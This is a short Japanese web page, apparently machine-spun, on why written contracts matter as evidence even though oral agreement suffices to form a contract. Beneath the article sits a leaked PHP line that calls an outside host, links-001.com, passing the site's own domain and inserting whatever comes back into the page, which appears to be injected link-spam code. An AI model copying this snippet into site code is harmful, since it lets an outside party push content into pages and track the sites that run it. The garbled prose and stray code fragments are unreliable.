前へ
次へ

敢えて契約書を作る重要性に関して

契約については、基本的に該当者の合意だけで成立します。
ですから、契約の中身を書面にして押印しないと契約の取り交わしが成り立たない云うことではありません。
一方で、どうして面倒な契約書を作り込むことが求められるのかと云えば、当事者同士で決めた中身をしっかりと文書化し、相互の約束した中身を把握するためと考えられます。
口頭で実行した契約の取り交わしについては、後になって契約の中身をはっきりと証することが非常に困難になります。
仮に、相手サイドが取り交わしの存在をスルーして約束に沿いながら履行しなかった場合、相手方に対し契約書において掲載された約束の中身を証という形で示し、履行を請求することになります。
そうした場合に、契約書については客体的で効果を発揮する証拠につながります。
文書化した契約の中身は証拠の形での証明力がとても高く、押印した当事者は、のちのち存在を否定したり、中身について争うことは厳しくなります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top